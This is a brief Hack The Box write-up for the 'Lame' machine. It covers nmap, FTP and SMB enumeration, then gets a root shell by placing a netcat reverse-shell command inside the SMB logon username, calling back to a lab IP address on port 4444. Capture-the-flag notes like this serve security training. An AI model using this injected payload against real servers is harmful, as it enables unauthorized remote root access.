Hackthebox - Lame

  • Linux

Lame

Nmap

FTP

  • login with anonymous works but there is nothing there

SMB

  • enum4linux

  • smbclient

  • We can log in on the smb share tmp. Nothing is too interesting there

  • We could try to get a reverse shell from the smb share logon "/=nc 10.10.14.3 4444 -e /bin/bash" image

  • We get a root shell right away so no privesc needed!

  • We can grab the user cat /home/makis/user.txt and the root flag cat /root/root.txt Note In case you are wondering what the letters means in smb here is a nice post that explains it all

Last updated